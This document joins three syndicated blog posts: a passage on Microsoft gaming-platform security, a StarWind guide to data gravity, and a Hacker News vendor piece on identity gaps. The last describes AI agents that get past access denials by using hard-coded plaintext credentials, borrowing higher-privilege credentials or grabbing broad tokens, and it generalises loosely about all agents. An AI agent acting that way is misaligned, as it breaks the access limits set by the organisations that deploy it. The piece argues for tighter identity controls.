Platforms, underpinning services like Xbox Game Pass and Xbox Cloud Gaming, require centralized infrastructure with high availability. Here, security must integrate seamlessly with identity systems and Microsoft-wide standards without slowing down gameplay. But platforms face a number of distinct risks.

The complexity of platforms makes them a rich target for financially-motivated cyberattackers seeking to take over top accounts—or send targeted messages to individuals in an environment where they aren’t expecting phishing, which can threaten both ecosystem trust and commercial strategy. And because platforms serve as the connective tissue between devices, we have to pay special attention to weaknesses in integration points.

We also contend with fraud and abuse in commerce systems, where bad actors attempt to manipulate in-game economies or exploit payment flows. These persistent cyberthreats require layered defenses, real-time monitoring, and rapid responses.

Learn more about Microsoft identity and access solutions

Game development studios, whether they are AAA giants, indie teams, or sole developers, thrive on flexibility. Their environments are highly individualized and frequently blend proprietary tools with third-party assets and co-development with partners. My job is to make sure they can innovate securely—balancing their creative freedom with governance and compliance timelines. But this flexibility introduces risks that look very different from experienced by centralized platforms.

On the plus side, studios’ independence creates smaller failure domains, leaving them free to make their own choices and experiment with new tools, partners and engineering practices, without putting the broader platform and peer studios at risk. But reputation, regulatory liability, and cyberattacker interest can’t be firewalled off so easily. So, we need to establish a baseline of controls and detect anomalies early, closing down blind spots—despite fragmented development environments and third-party risk from studios that rely on external contractors, middleware providers, and asset marketplaces.

And some of the cyberattacks are the same: Without tight identity governance, credential sprawl can create highly-privileged accounts that become prime targets for threat actors. Studios operate under tight deadlines and with small margins, so we need empathy for their desire to make things easier—and to avoid security checks when under milestone pressure—despite the risk those actions could cause to production.

It’s also important to note that the driving factor for many threat actors targeting studios is the incredibly high value of unreleased IP. For the same reason, social engineering and insider threats are a constant risk for studios.

Explore Microsoft data governance solutions

Studio Central Teams provide shared IT and infrastructure support. They’re the bridge between creative teams and operational security, ensuring that artists, producers, and marketers work in environments that are both productive and resilient. But that role comes with its own set of risks, which are often hidden in the complexity of shared services.

When central teams support diverse projects, maintaining consistent security baselines across cloud resources, build servers, and collaboration tools becomes difficult. Failing to maintain security consistency can lead to configuration drift—where a single misconfigured storage bucket or firewall rule can expose critical assets. But because central teams manage shared infrastructure, they are risk-averse to changes, including some critical security patches, that could cause cascading production failures.

These central teams can be security’s best partners for implementing strong monitoring and segmentation—but also need to be governed to avoid insider risk and toxic combinations of overlapping permissions.

Collaboration over control

Security in gaming isn’t about imposing rules. It’s more about partnership. I work closely with Temi Adabambo, General Manager for Gaming Security, Microsoft, and Eric Mourinho, Chief Architect, Microsoft, to co-develop secure environments and shared tooling. Governance is a dialogue. We collaborate between platform teams, studio IT, security architects, and technical directors in game studios. That’s how we manage exception handling, cross-team dependencies, and the tension between creative speed and security rigor.

One of the advantages of the Microsoft environment is the access it grants us to a security ecosystem that scales globally. In gaming, we build upon that foundation, adapting it for the unique needs of developers, platforms, and players:

• Identity and access management: We use Microsoft Entra ID to secure identities across Xbox Live, Game Pass, and studio environments. Shared identity systems allow frictionless sign-in for players while enforcing strong authentication for developers and partners.
• Compliance and governance: We rely on a combination of tools and processes to manage sensitive data and meet regulatory obligations across environments like public cloud infrastructure and bespoke studio setups. This includes Microsoft Purview for data classification and compliance monitoring, Microsoft Defender for Cloud for policy enforcement and resource hardening, Entra ID for identity governance, and Microsoft Sentinel for audit and reporting. Together, these capabilities help us maintain visibility, enforce standards, and respond quickly to compliance exceptions without slowing down development.
• Threat intelligence and detection: With Microsoft Defender for Cloud, Microsoft Sentinel, and proprietary Microsoft tooling, we gain visibility into cyberthreats across platforms and supply chains. These tools allow us to detect anomalies, respond quickly, and share intelligence across teams without slowing down creative workflows.
• Secure development lifecycles: We embed security into game development through automated code scanning, vulnerability management, and secure build pipelines, helping studios ship faster without sacrificing safety.

These are enterprise-grade capabilities, adapted to the needs of the global gaming culture of cultures. They allow us to protect billions of interactions while enabling the creativity that defines this industry. 

Looking ahead 

Gaming will only grow more complex. But I see that as an opportunity. Security presents challenges, but in facing those challenges head-on, we are constantly refining our practices, products, and player experiences. When we design for resilience, we protect not just games but the communities that help them thrive.

For Microsoft, that means treating gaming security as an ever-evolving system—one that changes with each new iteration of technology, player expectations, and the creative heartbeat of the industry.

Security teams and their families are gamers too. Visit the Xbox Wire and our recent blog post for Safer Internet Day to learn more about how we keep players and communities safe and secure at Xbox.

Microsoft
Deputy CISOs

To hear more from Microsoft Deputy CISOs, check out the OCISO blog series:

To stay on top of important security industry updates, explore resources specifically designed for CISOs, and learn best practices for improving your organization’s security posture, join the Microsoft CISO Digest distribution list.

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us on LinkedIn (Microsoft Security) and X (@MSFTSecurity) for the latest news and updates on cybersecurity.

---

¹Microsoft FY25 Fourth Quarter Earnings Conference Call  

²Microsoft to acquire Activision Blizzard to bring the joy and community of gaming to everyone, across every device 

The post Securing the gaming culture of cultures appeared first on Microsoft Security Blog.

from Microsoft Security Blog https://ift.tt/gC9EAur
via IFTTT

What is data gravity? A practical 2026 guide

Nobody plans for data gravity. We’ve watched teams discover, the hard way, that their “temporary” data lake has become the permanent center of the universe because five years of API integrations, security policies, and ad-hoc analytics pipelines all point at the same storage account. At that point the only real question is whether you move the data to the workload or the workload to the data.

Today, AI clusters and edge sprawl are pulling in one direction while sovereignty rules pull in another, and that question gets expensive fast.

What is data gravity?

Dave McCrory coined the term in 2010, and the physics metaphor still holds. As data accumulates, it becomes harder to move because live workflows depend on it. Integrations, APIs, pipelines, security controls, and dependent services form around it. Eventually the environment turns into a gravity well, and architecture decisions stop being neutral. The database, data lake, object store, or edge site you chose several years ago is now deciding where the next workload runs. You might think you’re choosing infrastructure freely, but at scale your existing data often makes that decision for you.

So data gravity is bigger than storage. It influences cloud strategy, AI adoption, backup design, disaster recovery, network planning, compliance, and vendor management. Once you see it, you can’t unsee it. I’ve always thought McCrory’s metaphor is the best one-sentence explanation of why enterprise architecture drifts the way it does.

Why 2026 is different

What changed? Scale, distribution, and the fact that enterprise data has become strategic in ways it wasn’t five years ago. AI initiatives are the most obvious accelerator. Modern AI systems need internal documents, transaction data, telemetry streams, images, logs, and historical datasets. Moving all of that into a separate AI platform is slow, expensive, or sometimes simply isn’t allowed. The result is that organizations are putting GPUs, inference servers, and RAG pipelines closer to existing datasets instead of centralizing the data elsewhere. That’s a real shift in how infrastructure gets planned. We’ve all seen the AI hype cycles, but this one actually changes where you rack the hardware.

Cloud economics add their own pressure. Most cloud providers make inbound transfers cheap or free, but cross-region replication, inter-cloud transfers, and outbound movement can become costly at scale. The challenge isn’t limited to bandwidth charges. Large migrations also require validation, orchestration, downtime planning, rollback procedures, and application reconfiguration. A 20 TB environment may still feel portable. Multi-petabyte environments usually don’t.

Edge data keeps piling up in factories, hospitals, stores, vehicles, and branch offices. Transmitting every raw event to a centralized platform is often inefficient or technically unnecessary. Organizations increasingly process data locally, keeping only summarized or filtered outputs for centralized retention.

Sovereignty rules add a legal layer on top of the physical and economic ones. Frameworks such as GDPR, the EU Data Act, and India’s Digital Personal Data Protection (DPDP) Act have turned data location into a core architectural constraint. Data residency and cross-border transfer restrictions now directly influence where infrastructure goes.

How data gravity works

Four primary forces produce data gravity: volume, latency, bandwidth, and governance. They don’t show up evenly, and most teams hit one of them well before the others.

Volume is the most visible factor. The bigger the dataset, the harder it is to copy, replicate, migrate, restore, or validate. It also tends to be the force that gets noticed last, because growth is slow until it isn’t.

Latency is usually the next one to bite. Fraud detection platforms, industrial control systems, medical imaging workflows, and AI inference pipelines all require low-latency access to operational data. Even small delays can violate response targets. I’ve seen teams hit the latency wall when they tried to run inference against a data lake three regions away, and the round-trip time alone blew their SLA.

Bandwidth is the physical wall behind that. A transfer may be technically possible, but the available throughput may not support completion within your maintenance windows or recovery objectives.

Governance introduces an entirely different class of restriction. Legal obligations or internal policies may prohibit data from leaving a region, tenant, facility, or cloud platform altogether. Unlike bandwidth or latency, governance constraints can’t be solved with more engineering.

A manufacturing environment illustrates these forces clearly. Modern production facilities can generate tens of terabytes of telemetry and machine data every day. Sending every raw event to a centralized cloud platform increases latency, consumes network capacity, and may create compliance concerns. So most architectures process data locally: filtering streams, running inference, detecting anomalies, maintaining short-term history near the source, and forwarding only summarized insights upstream. Once you start looking for these patterns, you see data gravity almost everywhere in modern infrastructure design.

When gravity helps and when it hurts

Data gravity isn’t necessarily a problem. Concentrated data makes a platform more useful at scale. When data is in one place, teams can govern it consistently. Security policies are easier to enforce, access control is more predictable, and analytics teams avoid reconciling conflicting copies of the same information across departments. AI initiatives benefit from more complete training and retrieval datasets, while backup and retention policies become easier to standardize.

The trouble starts when that same concentration gets hard to change. A multi-petabyte data lake may become too expensive to relocate. Applications depend on local latency characteristics. APIs, indexes, pipelines, reports, and backup jobs are all designed around the assumption that the data stays put. At that point, gravity constrains you. Migrations slow down. Cloud exit costs increase. Multi-cloud strategies become harder to execute, and vendor lock-in becomes a long-term operational concern. The same centralization that once improved governance can eventually reduce architectural agility.

This is usually the moment when organizations realize they are no longer simply managing infrastructure, but the consequences of years of accumulated data placement decisions. The objective becomes controlling where data gravity forms and how strongly it influences future decisions.

The egress problem

Cloud egress pricing is one of the clearest economic manifestations of data gravity. Public cloud platforms generally make inbound data transfers inexpensive, but outbound movement is treated very differently. At smaller scale, egress costs may appear negligible. At enterprise scale, they’re part of migration planning. At petabyte scale, even a few cents per gigabyte can turn a one-time transfer into a five-figure invoice before you’ve even started budgeting for engineering time, validation, downtime, and rehydration.

The provider invoice is also only part of the cost. You still need to verify data integrity, retune pipelines, redo access control, reconfigure applications, and plan a rollback path in case the migration fails. I used to ignore the egress line item until I saw it eclipse the compute bill.

None of this means cloud adoption is the wrong strategy. For many workloads, public cloud infrastructure remains the right operational and economic choice. The important point is that datasets rarely remain small indefinitely. Evaluating placement strategy, growth patterns, access behavior, and exit planning early gives you a lot more architectural flexibility later.

Data gravity at the edge

Edge environments produce smaller gravity wells distributed across the infrastructure map. A factory, hospital, retail store, or vehicle fleet generates data right next to the machines, sensors, cameras, or users it’s coming from. Shipping every raw event back to a central data center is often too slow, too expensive, or just unnecessary. As a result, edge architectures increasingly process data locally.

Inference, filtering, compression, aggregation, anomaly detection, and short-term storage all happen near the source. The central platform only gets the selected outputs: alerts, summaries, model updates, and anything that needs long-term retention. You see this pattern in manufacturing, retail video analytics, healthcare imaging, logistics, energy, and automotive. Edge data gravity is a big reason compute and storage are moving closer to where the data is created. I visited a plant last year where the edge cluster had become the de facto production environment because the WAN link couldn’t handle the camera feeds. (This is also why the smart money stopped predicting the death of on-prem storage back in 2019, but that’s an argument for another day.)

Data gravity in the AI era

AI intensifies data gravity because modern AI systems depend heavily on direct access to trusted operational data. Training, fine-tuning, retrieval, and inference workflows all become more effective when they can interact with authoritative datasets directly. The more sensitive or regulated that data becomes, the less practical it’s to export into a separate AI environment.

Retrieval-augmented generation is the clearest case. A RAG system needs to reach documents, databases, file shares, ticket histories, and internal knowledge bases. Pulling all of that into a new AI platform creates security, governance, latency, and duplication issues. In a lot of setups, the cleaner answer is to bring the AI layer to the governed data sources instead.

That changes the infrastructure conversation. Instead of focusing only on where compute resources are cheapest, organizations increasingly ask where compute can access data securely, efficiently, and with acceptable latency. This shift is why GPUs, inference servers, and AI services are now being deployed alongside existing data lakes, object stores, warehouses, and edge storage platforms. We learned that lesson while trying to build a RAG prototype against a locked-down ERP database. The security team wouldn’t let us export the schema – I think their exact words were “over our dead bodies” – so we ended up colocating the inference box in the same VLAN. It was messier than the architecture diagrams suggested. Actually, the diagrams never mentioned the VLAN limit at all.

Data gravity vs data sovereignty

Data gravity and data sovereignty are closely related, but they solve different problems. Gravity itself is a physical, operational, and economic constraint. Sovereignty is a legal and regulatory one. One makes data difficult to move efficiently. The other can make moving it restricted or outright prohibited.

This distinction matters because many infrastructure teams discover too late that solving the technical side of data movement doesn’t automatically solve the compliance side.

 

Dimension	Data gravity	Data sovereignty
Type of constraint	Physical and economic	Legal and regulatory
Main cause	Dataset size, latency, bandwidth, transfer cost	Jurisdictional law, sector rules, contracts
What it limits	Practical movement of data and workloads	Permitted location of data
Typical response	Hybrid architecture, edge processing, federated analytics, repatriation	Regional deployments, tenant isolation, in-country storage
Example	A multi-petabyte data lake too costly to migrate	EU personal data governed by GDPR and the EU Data Act

 

In production environments, these two forces usually reinforce each other. Sovereignty requirements keep data inside a jurisdiction or national boundary. As the amount of data grows, analytics platforms, AI services, backup systems, and dependent applications naturally move closer to it. Over time, the legal boundary becomes an architectural boundary as well. I once watched a compliance officer block a migration because the target region was three miles over a border. The map said it was fine. Their contract didn’t.

How to manage data gravity

You can’t eliminate data gravity, but you can design infrastructure in ways that reduce its operational impact. What matters is starting before the dataset becomes too large or too regulated to move efficiently.

 

Figure 1: Data gravity forming process and mitigation

 

The first step is visibility. Map your critical datasets, identify which applications depend on them, and estimate how quickly they are growing. Model migration costs early, including not only transfer fees but also engineering time, validation procedures, downtime planning, backup redesign, application dependencies, and rollback requirements. A useful planning exercise is to ask yourself: if this dataset grows 10x in the next three years, would your current architecture still be practical to migrate or reorganize?

You also need to separate workloads by latency sensitivity. Not every application requires local access to data. Some workloads tolerate distance well, while others depend on near-real-time response times. Understanding that difference is critical for placement decisions.

Data tiering remains one of the most effective operational controls. Hot data should stay close to active compute resources. Warm data can move into lower-cost but still accessible storage tiers. Cold data belongs in archival platforms, provided recovery times still align with business and compliance requirements.

At the edge, local processing reduces bandwidth consumption and minimizes unnecessary upstream transfers. In hybrid architectures, you should select resources based on workload behavior, latency requirements, governance constraints, and operational economics – not simply because the organization standardized on one deployment model years ago. I start every data migration review with one question: can we still move this in three years without a board-level budget request? (I skipped that question once in 2021 and we spent eleven months – plus a board presentation – unwinding a 400-TB warehouse the client had “temporarily” parked in a deprecated region.) If the answer’s no, we need to talk about tiering or splitting the dataset now.

Where should compute run?

 

Placement	Best fit	Watch out for	Data gravity angle
Cloud	Elastic analytics, SaaS integration, variable demand	Egress, region choice, long-term storage cost	Works best when data can live there long term
On-premises	Regulated data, predictable workloads, low-latency apps	Capacity planning, hardware lifecycle	Keeps compute close to controlled data
Edge	Sensor data, video, local inference, disconnected sites	Operations across many locations	Processes data before it moves upstream
Hybrid	Mixed cloud, on-prem, and edge needs	Governance and tool sprawl	Puts each workload near its most important data

 

If your workloads constantly move data across environments just to function, that’s usually a sign the placement model needs rethinking.

The role of HCI and on-premises storage

For organizations that keep gravity-sensitive workloads on-prem, the main challenge is keeping compute close to the data without adding infrastructure layers you don’t need.

Hyperconverged infrastructure (HCI) fits that pattern because it combines compute and storage resources within the same environment, which can help reduce latency and simplify operations for workloads that can’t easily move to the cloud.

StarWind Virtual SAN (VSAN) supports this model by pooling the local storage of hypervisor hosts into highly available shared storage for HCI clusters. From a data gravity perspective, this allows organizations to keep applications physically close to operational data while avoiding the cost and complexity of separate SAN infrastructure. Teams looking for a preconfigured deployment model can also use StarWind HCI Appliance (HCA) as a ready-to-deploy HCI platform.

Object storage platforms are increasingly important as datasets grow beyond traditional VM-centric infrastructure patterns. DataCore Swarm is designed for large-scale distributed object storage environments where unstructured data, archival content, AI datasets, media repositories, and edge-generated data continue expanding over time. Architectures like this help organizations scale storage horizontally while keeping data accessible across distributed environments without relying exclusively on centralized cloud repositories. I find HCI most useful when the alternative is explaining to a CFO why you need another storage array just to keep the VMs near the data.

FAQ

Why is data gravity important in 2026?

AI adoption, edge data growth, cloud egress costs, and sovereignty rules have all turned data location into an architectural decision. Where the data lives now drives where compute, analytics, backup, and AI infrastructure get deployed.

How does data gravity affect cloud strategy?

It complicates migration, multi-cloud design, and repatriation. Once large datasets pile up in one provider, moving them can mean high transfer costs, long migration windows, and a lot of validation work.

Is data gravity the same as vendor lock-in?

No. Lock-in is one possible outcome of data gravity, but gravity is broader. It includes size, latency, bandwidth, cost, governance, and legal constraints.

How does AI increase data gravity?

AI workloads need access to large volumes of trusted data. Training, fine-tuning, retrieval, and inference all work better when compute sits close to the governed data sources.

What’s the difference between data gravity and data sovereignty?

Gravity is a physical and economic constraint. Sovereignty is a legal one. Gravity makes data hard to move. Sovereignty can make moving it not allowed in the first place.

How can organizations reduce data gravity risks?

Organizations can reduce risk by mapping critical datasets, forecasting growth, modeling migration costs early, tiering storage, processing data locally at the edge, aligning compute placement with data locality, and defining realistic exit strategies before datasets become too large to move efficiently.

Why is HCI useful for managing data gravity?

HCI puts compute and storage in the same cluster, which keeps workloads close to data, cuts latency, simplifies on-prem deployments, and supports edge or regulated environments where shipping data to a distant platform isn’t realistic.

Final thoughts

If you’re still treating data placement as a secondary decision that can be fixed later, you’re setting yourself up for a very expensive surprise. We’ve watched teams spend more on a single egress migration than they would have spent on a couple of months of careful upfront planning. The hard truth is that your data will outlast your current platform, your current vendor, and probably your current job. Design for that. Keep compute flexible, keep data portable where governance allows, and never assume that the cheapest place to store something today is going to be the cheapest place to move it from tomorrow. Gravity is not a bug. It’s physics. Plan accordingly.

from StarWind Blog https://ift.tt/07Jhq4x
via IFTTT

Agent AI is Coming. Are You Ready?

New Industry Data Just Released Suggests Not.

On May 19th, 2026, Orchid Security released the results of our Identity Gap: Snapshot 2026. Among the findings, "identity dark matter" (the unseen, unmanaged elements of identity) now overshadows the visible elements 57% vs. 43%. And it couldn't have occurred at a worse time, with enterprises embracing Agent AI with both arms (and unfortunately, as Orchid co-founder Robert Wiseman explains, more than one eye closed). 

Why the concern, you may ask?

AI agents are shortcut-seekers by design. When given a task, they are trained to find the most efficient way to complete it, with the speed of machines and the creativity of humans. Denied access to a necessary system? Use a hard-coded credential stored in plaintext within the application. Need information they aren't entitled to read? "Borrow" a credential with higher privilege. Constantly being challenged across many different systems? Grab a broadly accepted token. Truly, Agent AI's creativity is remarkable. It just cuts both ways.

Just because an AI Agent can find a way to access an application, a system, a database, doesn't mean that they should do so. But where coding would restrict a traditional nonhuman actor and conscience should give a human pause, in most cases, AI Agents have no such constraints or compunctions.

That's why well-managed identity and access management is a critical foundation to keeping Agent AI activity within authorized bounds. Look no further than the cloud outages reported at the start of the year to understand this importance.

Of course, IAM shortcuts, gaps, and exceptions have built up over the years. Even decades. So it's not reasonable to expect everything to be cleaned up at once. That's why the findings from this year's Identity Gap Snapshot- the exposures most common across North American and European enterprises- are so important and timely.

Top 3 Findings

1. Invisible Non-Human Accounts: Two out of every three nonhuman accounts are set up locally in the application itself. That makes them unseen and unmanaged by the central IAM program. Understandable for machine and service accounts. Dangerous for autonomous AI agents.
2. Excessive Permissions: Seventy percent of all applications have an excessive number of privileged accounts. Far more than expected in the area of "least privilege" access and a major risk given today's threat actors, as well as those AI agents mentioned above.
3. Orphan Accounts: Forty percent of all accounts, across enterprise environments, were found to have outlived their authorized user. These "orphan" accounts are clearly unmanaged and likely unseen, and are ripe for the picking by threat actors and AI agents.

Those are just a few highlights from the full Identity Gap Snapshot. We encourage you to read the full report.

What You Can Do

If you are uncertain about how to address these (and similar) issues within your organization, or even how prevalent each one might be in your environment, our security researcher team has also published an Identity Security Readiness Checklist. If your organization is preparing for (or already participating in) the Agent AI transformation, the time to act is now.

Found this article interesting? This article is a contributed piece from one of our valued partners. Follow us on Google News, Twitter and LinkedIn to read more exclusive content we post.

from The Hacker News https://ift.tt/OlITN1b
via IFTTT